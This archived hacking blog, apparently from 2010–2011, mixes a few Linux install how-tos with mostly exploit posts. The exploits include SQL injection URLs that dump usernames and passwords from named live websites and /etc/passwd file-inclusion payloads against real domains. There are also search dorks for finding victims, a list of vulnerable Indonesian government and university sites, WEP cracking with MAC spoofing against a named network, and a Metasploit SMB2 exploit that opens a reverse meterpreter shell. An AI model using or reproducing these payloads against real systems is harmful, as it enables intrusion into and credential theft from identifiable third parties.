NoGe.ZoNe

How To Enable Java Plugin on Firefox 8.0 in Ubuntu 10.04

2011-12-01T10:40:00.006+07:00

Install Java Plugin

Download Java Runtime Environment for linux
http://www.java.com/en/download/linux_manual.jsp?locale=en
Choose Linux (self-extracting file)

Make folder java folder in /usr
root@evilc0de:/home/noge# cd /usr
root@evilc0de:/usr# mkdir java

copy jre-6u29-linux-i586.bin to /usr/java and extract it
root@evilc0de:/usr/java# ./jre-6u29-linux-i586.bin

Enable Java on Firefox

Go to /home/your_user/.mozilla
root@evilc0de:/usr/java# cd /home/noge/.mozilla

Make plugins directory
root@evilc0de:/home/noge/.mozilla# mkdir plugins
root@evilc0de:/home/noge/.mozilla# cd plugins

Make symbolic link to java plugin
root@evilc0de:/home/noge/.mozilla/plugins# ln -s /usr/java/jre1.6.0_29/lib/i386/libnpjp2.so

Open firefox type about:plugins on address bar and enter
You will see java plugin is enabled [Java(TM) Plug-in 1.6.0_29]

I hope this article usefull for who can't enable java plugin on firefox

./NoGe

wifite <= another wifi cracking tool

2011-11-13T17:46:00.018+07:00

this tool is design for backtrack4 so if you using another linux distro you need to install aircrack-ng first

lets get started
set your interface to monitor mode

run wifite

# python wifite.py

wifite will automatically detect available access point and client also your interface
press CTRL+C when you ready to attack

you will see all access point in your range
i just have 3 access point :(
now you can select which access point do you want to attack
if you want attack all access point in your range just type "all" and enter
in my case i will attack access point number 2 so i type "2" and enter

fake authentication successfull but my 2 attack not success :(
arp replay attack timeout and chop chop attack failed
wifite will automatically use another attack method like fragmentation attack

fragmentation attack require packetforge-ng to build keystream
if the capture packet is enough, wifite will automatically crack for a key
walla.. key found!! :))

now i can connect to access point

download wifite

download aircrack-ng

use this command to view help

# python wifite.py -h

./NoGe

Pivotx TimThumb Remote Code Execution Vuln

2011-10-15T20:24:00.001+07:00

[o] PivotX <= Remote Code Execution Vulnerability

Software : PivotX ver 2.2.6
Vendor : http://pivotx.net/
Original Author : MaXe [ http://www.exploit-db.com/exploits/17602/ ]

[o] Vulnerability

pivotx/includes/timthumb.php

[o] Exploit

http://localhost/pivotx/includes/timthumb.php?src=[RCE]

[o] Fix

Upgrade to new version (2.3.0)

Pentest Service [ Web Applications and Web Server ]

2011-09-24T20:57:00.003+07:00

hi folks..

i'm start to open penetration tester service for web application and web server.
why penetration tester? because security is very important things in a cyber world.
you don't wanna wake up in the morning and find out someone already steal your sensitive information from your database right? that's why i'm here to prevent things like that happen.

contact me for more details.. noge[dot]code[at]gmail[dot]com

PlaySMS Remote File Inclusion Vulnerability

2011-09-06T20:46:00.005+07:00

[o] PlaySMS <= Remote File Inclusion Vulnerability

Software : PlaySMS ver 0.9.5.2
Vendor : http://playsms.org/
Author : NoGe

[o] Vulnerability

affected all this files

web/plugin/themes/default/page_forgot.php
web/plugin/themes/default/page_login.php
web/plugin/themes/default/page_noaccess.php
web/plugin/themes/default/page_register.php
web/plugin/themes/km2/page_noaccess.php
web/plugin/themes/work2/page_forgot.php
web/plugin/themes/work2/page_login.php
web/plugin/themes/work2/page_noaccess.php
web/plugin/themes/work2/page_register.php

[o] Exploit

http://localhost/[path]/web/plugin/themes/default/page_forgot.php?apps_path[themes]=[RFI]

[o] PoC

http://localhost/[path]/web/plugin/themes/default/page_forgot.php?apps_path[themes]=http://phpshell?

JoomTouch Joomla Component <= LFI Vuln

2011-08-17T17:14:00.002+07:00

[o] JoomTouch Joomla Component <= Local File Inclusion Vulnerability

Software : com_joomtouch ver 1.0.2
Vendor : http://www.joomtouch.com/
Dork : "com_joomtouch"
Author : NoGe

[o] Exploit

http://localhost/[path]/index.php?option=com_joomtouch&controller=[LFI]

[o] PoC

http://torah5.com/index.php?option=com_joomtouch&controller=../../../../../../../../../../../../../../../../../../../etc/passwd%00
http://www.shivamtranscon.com/index.php?option=com_joomtouch&controller=../../../../../../../../../../../../../../../../../../../etc/passwd%00

DIRGAHAYU INDONESIAKU... MERDEKA!!!

TNR Enhanced Joomla Search SQL Injection Vulnerability

2011-08-09T20:15:00.002+07:00

[o] TNR Enhanced Joomla Search SQL Injection Vulnerability

Software : com_esearch ver 3.0.0
Vendor : http://www.tnrjoomla.com/
Dork : "com_esearch"
Author : NoGe

[o] Exploit

http://localhost/[path]/index.php?search=NoGe&option=com_esearch&searchId=[SQLi]

[o] PoC

http://www.visitdetroit.com/index.php?search=NoGe&option=com_esearch&searchId=-1+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13+from+jos_users--
http://www.tnrjoomla.com/index.php?search=NoGe&option=com_esearch&searchId=-1+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14+from+jos_users--

Blue Utopia CMS SQLi Vulnerability

2011-07-17T11:07:00.008+07:00

[o] Blue Utopia CMS SQL Injection Vulnerability

Software : Blue Utopia CMS
Vendor : http://blueutopia.com/
Dork : "Powered by Blue Utopia"
Author : NoGe

[o] Exploit

http://localhost/[path]/index.php?page=news&full=[SQLi}

[o] PoC

http://www.geaugadems.org/index.php?page=news&full=-1071+union+select+1,version(),database(),4,5,6,7,8,9,10,11,12,13,14,15--
http://buetowforschoolboard.com/index.php?page=news&full=-2+union+select+1,version(),database(),4,5,6,7,8,9,10,11,12,13,14,15--

[o] Note

this is a private script
all in one server
vendor already notified
bug has been fixed by vendor! :))

MyNews Arbitrary File Upload Vuln

2011-07-16T22:55:00.007+07:00

[o] MyNews Arbitrary File Upload Vulnerability

Software : MyNews 1.6.5
Vendor : http://www.planetluc.com/
Dork : "Powered by MyNews"
Author : NoGe

[o] Exploit

FCKeditor/editor/filemanager/upload/php/config.php

// SECURITY: You must explicitelly enable this "uploader".

$Config['Enabled'] = true ;

http://localhost/[path]/FCKeditor/editor/filemanager/upload/test.html

in the "File Uploader" section, select "PHP"
browse file u want to upload and click "Send it to the Server"
if the file uploaded with no error, u will see the file path in "Uploaded File URL"

http://localhost/[path]/files/your_file.txt

[o] PoC

http://www.planetluc.com/en/demo/mynews/FCKeditor/editor/filemanager/upload/test.html
http://www.conveyorsystemsltd.co.uk/FCKeditor/editor/filemanager/upload/test.html

Install firefox 5 in ubuntu

2011-07-16T11:13:00.008+07:00

What’s new in Firefox 5 RC :

Added support for CSS animations
The Do-Not-Track header preference has been moved to increase discoverability
Improved canvas, JavaScript, memory, and networking performance
Improved standards support for HTML5, XHR, MathML, SMIL, and canvas
Improved spell checking for some locales
Improved desktop environment integration for Linux users
WebGL content can no longer load cross-domain textures
Background tabs have setTimeout and setInterval clamped to 1000ms to improve performance
The Firefox development channel switcher introduced in previous Firefox Beta updates has been removed

System Requirements

Linux
Software Requirements
Please note that Linux distributors may provide packages for your distribution which have different requirements.

Firefox will not run at all without the following libraries or packages:
GTK+ 2.10 or higher
GLib 2.12 or higher
Pango 1.14 or higher
X.Org 1.0 or higher (1.7 or higher is recommended)
libstdc++ 4.3 or higher

For optimal functionality, we recommend the following libraries or packages:
NetworkManager 0.7 or higher
DBus 1.0 or higher
HAL 0.5.8 or higher
GNOME 2.16 or higher

Installing Firefox 5

Open terminal
Application >> Accessories >> Terminal

sudo add-apt-repository ppa:mozillateam/firefox-stable

sudo apt-get update

sudo apt-get upgrade

firefox 5 installed

video reupload

2011-07-13T01:00:00.005+07:00

[o] php://input injection

watch
http://pacenoge.info/video/php_input.html
download
http://pacenoge.info/video/php_input.swf

[o] e107 Code Exec

watch
http://pacenoge.info/video/e107.html
download
http://pacenoge.info/video/e107.swf

[o] PHP shell upload via LFI vuln

watch
http://pacenoge.info/video/lfi.html
download
http://pacenoge.info/video/lfi.swf

[o] LFI to RCE

watch
http://pacenoge.info/video/lfi2rce.html
download
http://pacenoge.info/video/lfi2rce.swf

[o] LFI local upload form

watch
http://pacenoge.info/video/upload_form.html
download
http://pacenoge.info/video/upload_form.swf

[o] Remote Command Execute @ CGI Script

watch
http://pacenoge.info/video/rce_cgi.html
download
http://pacenoge.info/video/rce_cgi.swf

D-Forum 1.11 SQL Injection Vulnerability

2011-07-12T11:34:00.003+07:00

[o] D-Forum 1.11 SQL Injection Vulnerability

Software : D-Forum version 1.11 [previous version affected too]
Vendor : http://www.adalis.fr/dforum
Author : NoGe

[o] Exploit

http://localhost/[path]/nav.php3?page=voirsujet&boardid=1&postid=[SQLi]

[o] Dork

"Powered by D-forum"
"nav.php3?page=voirsujet"

[o] PoC

http://www.enesm.com/forum/nav.php3?page=voirsujet&boardid=x&postid=-null+union+select+1,2,3,group_concat(0x3a,user_login,0x3a,user_pass,0x3a),5,6,7,8,9,10,11,12,13+from+dforum_users--
http://bmxverrieres.free.fr/dforum/nav.php3?page=voirsujet&boardid=x&postid=-null+union+select+1,2,3,group_concat(0x3a,user_login,0x3a,user_pass,0x3a),5,6,7,8,9,10,11,12,13+from+dforum_users--

KloNews 2.0 Blind SQLi Vulnerability

2011-07-12T11:11:00.004+07:00

[o] KloNews 2.0 Blind SQLi Vulnerability

Software : KloNews 2.0
Vendor : http://www.kloweb.net/
Author : NoGe

[o] Exploit

http://localhost/[path]/news.php?news=1+AND+SUBSTRING(@@version,1,1)=5 << True
http://localhost/[path]/news.php?news=1+AND+SUBSTRING(@@version,1,1)=4 << False

[o] Dork

"Propulsé par KloNews"

[o] PoC

http://saadacity.com/klonews/upload/news.php?news=1+AND+SUBSTRING(@@version,1,1)=5
http://saadacity.com/klonews/upload/news.php?news=1+AND+SUBSTRING(@@version,1,1)=4

fragmentation attack with aireplay-ng

2011-07-06T12:49:00.002+07:00

basically, the program obtains a small amount of keying material from the packet
then attempts to send ARP and/or LLC packets with known content to the access point.
if the packet is successfully echoed back by the access point then a larger amount
of keying information can be obtained from the returned packet.

scenario

ESSID : wireless
BSSID : 00:02:6F:23:2B:67
CLIENT MAC : 00:02:4G:87:22:FG

[o] u need to authenticate with the access point.

root@evilc0de:/home/noge# aireplay-ng -1 6000 -a 00:02:6F:23:2B:67 -h 00:02:4G:87:22:FG mon0
The interface MAC (00:1D:8E:11:7B:0C) doesn't match the specified MAC (-h).
ifconfig mon0 hw ether 00:02:4G:87:22:FG
09:58:55 Waiting for beacon frame (BSSID: 00:02:6F:23:2B:67) on channel 10

09:58:55 Sending Authentication Request (Open System)
09:58:55 Authentication successful
09:58:55 Sending Association Request
09:58:55 Association successful :-) (AID: 1)

09:59:10 Sending keep-alive packet
09:59:25 Sending keep-alive packet
09:59:40 Sending keep-alive packet

[o] run standard ARP request replay

root@evilc0de:/home/noge# aireplay-ng -3 -b 00:02:6F:23:2B:67 -h 00:02:4G:87:22:FG mon0
For information, no action required: Using gettimeofday() instead of /dev/rtc
The interface MAC (00:1D:8E:11:7B:0C) doesn't match the specified MAC (-h).
ifconfig mon0 hw ether 00:02:4G:87:22:FG
08:07:58 Waiting for beacon frame (BSSID: 00:02:6F:23:2B:67) on channel 10
Saving ARP requests in replay_arp-0706-080758.cap
You should also start airodump-ng to capture replies.
728 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)

as u can see i got 0 ARP request

[o] fragmentation attack!

root@evilc0de:/home/noge# aireplay-ng -5 -b 00:02:6F:23:2B:67 -h 00:02:4G:87:22:FG mon0
For information, no action required: Using gettimeofday() instead of /dev/rtc
The interface MAC (00:1D:8E:11:7B:0C) doesn't match the specified MAC (-h).
ifconfig mon0 hw ether 00:02:4G:87:22:FG
09:59:00 Waiting for beacon frame (BSSID: 00:02:6F:23:2B:67) on channel 10
09:59:00 Waiting for a data packet...
Read 432 packets...

Size: 112, FromDS: 1, ToDS: 0 (WEP)

BSSID = 00:02:6F:23:2B:67
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:02:4G:87:22:FG

0x0000: 0842 2c00 0002 6f87 11fe 0002 6f55 2bd2 .B,...o.....oU+.
0x0010: 000c 4252 2553 e05c 1398 2200 e7b4 f9fa ..BR%S.\..".....
0x0020: a786 d686 bfd1 8151 5bcf a8cb eac8 a10a .......Q[.......
0x0030: 52a9 49c5 ade4 de32 ef4b 294e c961 7de0 R.I....2.K)N.a}.
0x0040: 95ce afe7 ae32 225e 3af0 73db e7aa 47e4 .....2"^:.s...G.
0x0050: 6053 9a4c 0b8d 985b d9fe c1c3 dfc4 b82e `S.L...[........
0x0060: 82b4 a7f0 31bf 8fc6 dd01 4e77 1c02 0520 ....1.....Nw...

Use this packet ? y

Saving chosen packet in replay_src-0706-095931.cap
09:59:34 Data packet found!
09:59:34 Sending fragmented packet
09:59:34 Got RELAYED packet!!
09:59:34 Trying to get 384 bytes of a keystream
09:59:35 No answer, repeating...
09:59:35 Trying to get 384 bytes of a keystream
09:59:35 Trying a LLC NULL packet
09:59:37 No answer, repeating...
09:59:37 Trying to get 384 bytes of a keystream
09:59:39 No answer, repeating...
09:59:39 Trying to get 384 bytes of a keystream
09:59:39 Trying a LLC NULL packet
09:59:39 Got RELAYED packet!!
09:59:39 Trying to get 1500 bytes of a keystream
09:59:39 Got RELAYED packet!!
Saving keystream in fragment-0706-095939.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream

[o] build u'r packet with packetforge-ng

root@evilc0de:/home/noge# packetforge-ng -0 -a 00:02:6F:23:2B:67 -h 00:02:4G:87:22:FG -k 255.255.255.255 -l 255.255.255.255 -y fragment-0706-095939.xor -w privx
Wrote packet to: privx

[o] use privx to capture ARP request

root@evilc0de:/home/noge# aireplay-ng -2 -x 150 -r privx -h 00:02:4G:87:22:FG mon0
For information, no action required: Using gettimeofday() instead of /dev/rtc
The interface MAC (00:1D:8E:11:7B:0C) doesn't match the specified MAC (-h).
ifconfig mon0 hw ether 00:02:4G:87:22:FG

Size: 68, FromDS: 0, ToDS: 1 (WEP)

BSSID = 00:02:6F:23:2B:67
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:02:4G:87:22:FG

0x0000: 0841 0201 0002 6f55 2bd2 0002 6f87 11fe .A....oU+...o...
0x0010: ffff ffff ffff 8001 3e98 2200 3a8c be0b ........>.".:...
0x0020: 0926 44f8 fe6a c35c d517 3ff1 2a8b 95df .&D..j.\..?.*...
0x0030: 97eb b45d bab9 b71b e777 edc7 8678 f1e7 ...].....w...x..
0x0040: d1b2 68b7 ..h.

Use this packet ? y

Saving chosen packet in replay_src-0706-100037.cap
You should also start airodump-ng to capture replies.

Sent 37888 packets...(150 pps)

[o] ARP request start to showing some result [check standard ARP request replay]

422382 packets (got 103517 ARP requests and 239278 ACKs), sent 125781 packets...(478 pps)

[o] run airodump-ng to capture replies

root@evilc0de:/home/noge# airodump-ng -c 10 --bssid 00:02:6F:23:2B:67 -w wep mon0
CH 10 ][ Elapsed: 20 mins ][ 2011-07-06 10:19

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:02:6F:23:2B:67 -75 90 11337 100296 89 10 54 . WEP WEP OPN wireless

BSSID STATION PWR Rate Lost Packets Probes

00:02:6F:23:2B:67 00:02:4G:87:22:FG 0 36 - 1 1271 216477

[o] crack u'r .cap file to find the key!

WEP key problem [SOLVED]

2011-07-05T13:07:00.006+07:00

my machine
ubuntu 9.10
linksys wusb54g ver 4
chipset ralink 2570
aircrack-ng 1.1

i have a problem with WEP key..
after i crack IVS with aircrack-ng, key found! but can't connect to access point.

the access point keep ask me for the WEP key.
the key is correct! what's wrong then?

access point filter mac address! only client mac address can connect to it.
so the solution is use client mac address! ^_^
if you remember client mac then change u'r mac with client mac.

what is client mac address?
client mac address is the mac address that u're spoofing with aireplay-ng.
aireplay-ng -3 -b -h

i forgot client mac address.. -___-
if u start capture replies there is 4 file created.

-rw-r--r-- 1 root root 86179840 2011-07-03 01:08 qwe-01.cap
-rw-r--r-- 1 root root 769 2011-07-03 01:08 qwe-01.csv
-rw-r--r-- 1 root root 591 2011-07-03 01:08 qwe-01.kismet.csv
-rw-r--r-- 1 root root 5711 2011-07-03 01:08 qwe-01.kismet.netxml

now search client mac address in qwe-01.kismet.netxml file.
find a client with big packet.

root@evilc0de:/home/noge# cat qwe-01.kismet.netxml
---cut---

---cut---

the packet is big enough 69983
yey!! i found my client 4C:0F:6E:60:25:AC.. :))

see u'r interface..
my interface is wlan3 and my default mac address is 00:1d:7e:09:6b:0a.
we need to change default mac <00:1d:7e:09:6b:0a> with client mac <4C:0F:6E:60:25:AC>

root@evilc0de:/home/noge# ifconfig wlan3
wlan3 Link encap:Ethernet HWaddr 00:1d:7e:09:6b:0a
inet6 addr: fe80::21d:7eff:fe09:6b0a/64 Scope:Link
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:15 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:3816 (3.8 KB)

if we run iwconfig we can see no connection there.
Access Point: Not-Associated
Encryption key:off

root@evilc0de:/home/noge# iwconfig wlan3
wlan3 IEEE 802.11bg Mode:Managed Frequency:2.457 GHz
Access Point: Not-Associated Tx-Power=20 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:on
Link Quality:0 Signal level:0 Noise level:0
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0

let's change our mac!

first i'll set my interface down so i can change the mac address.

root@evilc0de:/home/noge# ifconfig wlan3 down

now change the mac with macchanger.

root@evilc0de:/home/noge# macchanger -m 4C:0F:6E:60:25:AC wlan3
Current MAC: 00:1d:7e:09:6b:0a (unknown)
Faked MAC: 4c:0f:6e:60:25:ac (unknown)

bring it up again..

root@evilc0de:/home/noge# ifconfig wlan3 up

as u can see below my mac address has change 4c:0f:6e:60:25:ac.

root@evilc0de:/home/noge# ifconfig wlan3
wlan3 Link encap:Ethernet HWaddr 4c:0f:6e:60:25:ac
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:15 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:3816 (3.8 KB)

now try to connect with the access point.
walla!! its connected.. ^___^

ESSID:"Aloysius-NET"
Access Point: 00:02:6F:54:04:75
Encryption key:0987-6123-45

root@evilc0de:/home/noge# iwconfig wlan3
wlan3 IEEE 802.11bg ESSID:"Aloysius-NET"
Mode:Managed Frequency:2.462 GHz Access Point: 00:02:6F:54:04:75
Bit Rate=1 Mb/s Tx-Power=20 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:0987-6123-45
Power Management:on
Link Quality=40/70 Signal level=-70 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0

ping test..

root@evilc0de:/home/noge# ping antisecurity.org
PING antisecurity.org (168.144.82.176) 56(84) bytes of data.
64 bytes from 168.144.82.176: icmp_seq=1 ttl=56 time=740 ms
64 bytes from 168.144.82.176: icmp_seq=2 ttl=56 time=1082 ms
64 bytes from 168.144.82.176: icmp_seq=3 ttl=56 time=778 ms
64 bytes from 168.144.82.176: icmp_seq=4 ttl=56 time=797 ms
64 bytes from 168.144.82.176: icmp_seq=6 ttl=56 time=711 ms
^Z
[8]+ Stopped ping antisecurity.org
root@evilc0de:/home/noge#

so if you have WEP key but can't connect to the access point, try change u'r mac with client mac.

big thanks to bob and array
salam from papua.. :)

Howdy!!

2011-01-18T19:58:00.002+07:00

hey ya all...

i know its to late but HAPPY NEW YEAR to u... ^_____^

its been more then 3 month since my last post. lol
some video tutorial link are dead coz my host where i put all videos is suspended. :p
im sorry about that!!
i will upload the videos and update this blog again ASAP.

be save... :))

./NoGe

Exploiting Vista SP1 with SMB2 [metasploit]

2010-09-22T02:48:00.003+07:00

[o] Exploiting Vista SP1 with SMB2 [metasploit]
[o] Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference

root@evilc0de:~# msfconsole

<>
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *

=[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 590 exploits - 302 auxiliary
+ -- --=[ 224 payloads - 27 encoders - 8 nops
=[ svn r10414 updated today (2010.09.21)

msf > use scanner/smb/smb_version
msf auxiliary(smb_version) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
SMBDomain WORKGROUP no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads

msf auxiliary(smb_version) > set RHOSTS 172.16.0.1-172.16.4.255
RHOSTS => 172.16.0.1-172.16.4.255
msf auxiliary(smb_version) > set THREADS 50
THREADS => 50
msf auxiliary(smb_version) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 172.16.0.1-172.16.4.255 yes The target address range or CIDR identifier
SMBDomain WORKGROUP no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 50 yes The number of concurrent threads

msf auxiliary(smb_version) > run

[*] 172.16.1.145 is running Windows 7 Professional (Build 7600) (language: Unknown) (name:ONAN-ULTIMECIA) (domain:ONAN-ULTIMECIA)
[*] 172.16.1.138 is running Windows Vista Ultimate Service Pack 1 (language: Unknown) (name:PUPEN-SNOWBLACK) (domain:KAPUKVALLEY)
[*] 172.16.1.173 is running Windows XP Service Pack 2+ (language: English) (name:ALLSTAR-TAPO) (domain:KAPUKVALLEY)
[*] 172.16.1.162 is running Windows 7 Ultimate (Build 7600) (language: Unknown) (name:PINKY-BENZ) (domain:KAPUKVALLEY)

msf auxiliary(smb_version) > use windows/smb/ms09_050_smb2_negotiate_func_index
msf exploit(ms09_050_smb2_negotiate_func_index) > info

Name: Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
Version: 9669
Platform: Windows
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Good

Provided by:
laurent.gaffie
hdm
sf

Available targets:
Id Name
-- ----
0 Windows Vista SP1/SP2 and Server 2008 (x86)

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes The target port
WAIT 180 yes The number of seconds to wait for the attack to complete.

Payload information:
Space: 1024

Description:
This module exploits an out of bounds function table dereference in
the SMB request validation code of the SRV2.SYS driver included with
Windows Vista, Windows 7 release candidates (not RTM), and Windows
2008 Server prior to R2. Windows Vista without SP1 does not seem
affected by this flaw.

References:
http://www.microsoft.com/technet/security/bulletin/MS09-050.mspx
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-3103
http://www.securityfocus.com/bid/36299
http://www.osvdb.org/57799
http://seclists.org/fulldisclosure/2009/Sep/0039.html
http://www.microsoft.com/technet/security/Bulletin/MS09-050.mspx

msf exploit(ms09_050_smb2_negotiate_func_index) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms09_050_smb2_negotiate_func_index) > set RHOST 172.16.1.138
RHOST => 172.16.1.138
msf exploit(ms09_050_smb2_negotiate_func_index) > set LHOST 172.16.1.12
LHOST => 172.16.1.12
msf exploit(ms09_050_smb2_negotiate_func_index) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 172.16.1.138 yes The target address
RPORT 445 yes The target port
WAIT 180 yes The number of seconds to wait for the attack to complete.

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process
LHOST 172.16.1.12 yes The listen address
LPORT 4444 yes The listen port

Exploit target:

Id Name
-- ----
0 Windows Vista SP1/SP2 and Server 2008 (x86)

msf exploit(ms09_050_smb2_negotiate_func_index) > exploit

[*] Started reverse handler on 172.16.1.12:4444
[*] Connecting to the target (172.16.1.138:445)...
[*] Sending the exploit packet (872 bytes)...
[*] Waiting up to 180 seconds for exploit to trigger...
[*] Sending stage (748544 bytes) to 172.16.1.138
[*] Meterpreter session 1 opened (172.16.1.12:4444 -> 172.16.1.138:55345) at 2010-09-21 23:31:10 +0700

meterpreter > sysinfo
Computer: PUPEN-SNOWBLACK
OS : Windows Vista (Build 6001, Service Pack 1).
Arch : x86
Language: en_US

meterpreter > shell
Process 1240 created.
Channel 1 created.
Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation. All rights reserved.

C:\Windows\system32>net user
net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator Aulia Guest
laptop
The command completed with one or more errors.

C:\Windows\system32>

Fotobook Editor 5.0 DLL Hijacking Vulnerability

2010-09-21T11:15:00.002+07:00

[o] Fotobook Editor 5.0 DLL Hijacking Vulnerability

Software : Fotobook Editor 5.0 version 2.8.0.1 (CCPublisher.exe)
Vendor : http://www.fotobook.co.uk/
Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
Contact : public[at]antisecurity[dot]org
Home : http://antisecurity.org/

[o] Vulnerable DLL

fwpuclnt.dll

[o] Extension

.dtp

[o] PoC

http://antisecurity.org/sploit/fotobook_dll.zip
http://www.packetstormsecurity.org/1009-exploits/fotobook-dllhijack.tgz

[o] Usage

+ Unzip fotobook_dll.zip
+ Double click exploit.kcp or open with KinetiCount.exe
+ You will see calc pop up

[o] Tested On

Microsoft Windows XP Professional
Version 5.1.2600 Service Pack 2 Build 2600

Kineti Count DLL Hijacking Vulnerability

2010-09-21T11:05:00.002+07:00

[o] Kineti Count DLL Hijacking Vulnerability

Software : Kineti Count version 1.0 Beta (KinetiCount.exe)
Vendor : http://www.kineticstorm.com/
Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
Contact : public[at]antisecurity[dot]org
Home : http://antisecurity.org/

[o] Vulnerable DLL

dwmapi.dll

[o] Extension

.kcp

[o] PoC

http://antisecurity.org/sploit/kineticount_dll.zip
http://www.packetstormsecurity.org/1009-exploits/kineticount-dllhijack.tgz

[o] Usage

+ Unzip kineticount_dll.zip
+ Double click exploit.kcp or open with KinetiCount.exe
+ You will see calc pop up

[o] Tested On

Microsoft Windows XP Professional
Version 5.1.2600 Service Pack 2 Build 2600

Remote Command Execute [at] CGI Script [video]

2010-09-20T13:16:00.003+07:00

The Common Gateway Interface (CGI) is a standard protocol that defines how webserver software can delegate the generation of webpages to a console application. Such applications are known as CGI scripts; they can be written in any programming language, although scripting languages are often used.
A CGI script is a program written in one of several popular languages such as Perl, PHP, Python, etc. that can pass data between a web page and programs on the web server. CGI scripts are widely used to process forms such as search boxes.

This is an old school stuff but some web still vuln with this..

Have fun!!

watch the video HERE

download the video HERE

./NoGe

ABHIMANYU INFOTECH LFI Vuln [private script]

2010-09-13T13:17:00.003+07:00

[o] ABHIMANYU INFOTECH Local File Inclusion Vulnerability

Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com

[o] Vulnerable File

index.php

if(isset($_REQUEST['file']))
{
$file=$_REQUEST['file'];
}
else
{
$file="home.php";
}
?>

[o] Exploit

http://localhost/[path]/index.php?file=[LFI]

[o] Dork

"ABHIMANYU INFOTECH"

e107 Code Exec in contact.php [video]

2010-07-05T11:05:00.007+07:00

e107 is a content management system written in PHP and using the popular open source MySQL database system for content storage. It's completely free, totally customisable and in constant development.

here is the exploit by McFly
http://www.exploit-db.com/exploits/12715/

in this video i do it manually with mozilla addons [Live HTTP Headers]

greetz to AntiSecurity

watch the video HERE

download it HERE

./NoGe

php://input Injection [video]

2010-07-02T03:43:00.004+07:00

php://input allows you to read raw POST data. It is a less memory intensive alternative to $HTTP_RAW_POST_DATA and does not need any special php.ini directives. php://input is not available with enctype="multipart/form-data". php://input can only be read once.

greetz to AntiSecurity

watch the video HERE

download the video HERE

./NoGe

Indonesian Vuln Sites [ part five ]

2010-06-29T00:14:00.004+07:00

http://www.dikmenum.go.id/dataapp/datapokok/index.php?module=../../../../../../../../../../../../../../../etc/passwd

http://www.kontras.org/index.php?hal=siaran_pers&id=1058+and+1=2+union+all+select+1,database(),3,4,version(),6,7--

http://www.logos-institute.com/index.php?menu=pagealumni&idangkatan=1+and+1=2+union+all+select+database(),version()--

http://fkk.umj.ac.id/index.php?module=../../../../../../../../../../../../../../../etc/passwd

http://se.unikom.ac.id/artikel.php?id=3+and+1=2+union+all+select+1,database(),user(),version(),5--&tipe=detail

http://lisaanashidqin.or.id/index.php?nid=19+AND+1=2+UNION+ALL+SELECT+1,version(),3,4,5,6,7--

http://www.slickbar.co.id/index.php?page=../../../../../../../../../../../../../../../etc/passwd

http://www.beraucoal.co.id/newsdetail.php?idNews=16+AND+1=2+UNION+SELECT+1,2,version(),4,database(),user(),7--

http://www.vision.co.id/vision/detail_career.php?id=16+and+1=2+union+all+select+1,version(),3,user(),database()--

http://www.stiki.ac.id/index.php?modules=../../../../../../../../../../../../../../../etc/passwd

http://pusdiklat.pnri.go.id/detail.php?ID=165+AND+1=2+UNION+ALL+SELECT+1,version(),3,database(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--

http://interior.fs.uns.ac.id/config/artikel.php?id=9+AND+1=2+UNION+ALL+SELECT+1,2,3,version()--

http://www.dmcindonesia.web.id/?lang=../../../../../../../../../../../../../../../etc/passwd

http://www.smkpgrimojoagung.sch.id/artikel.php?id=4+AND+1=2+UNION+ALL+SELECT+1,version(),database(),4,5--

http://www.bc-club.co.id/artikel.php?id=1+AND+1=2+UNION+ALL+SELECT+1,version(),database(),4,user()--

http://pustaka.ut.ac.id/puslata/index.php?menu=../../../../../../../../../../../../../../../etc/passwd

http://iib.diknas.go.id/info.php?id=1+AND+1=2+UNION+ALL+SELECT+1,version(),user(),4,database(),6,7--

http://www.astragraphia.co.id/EN/newsroom/newsdetail.php?id=195+and+1=2+union+select+database(),version(),3--&ntype=5

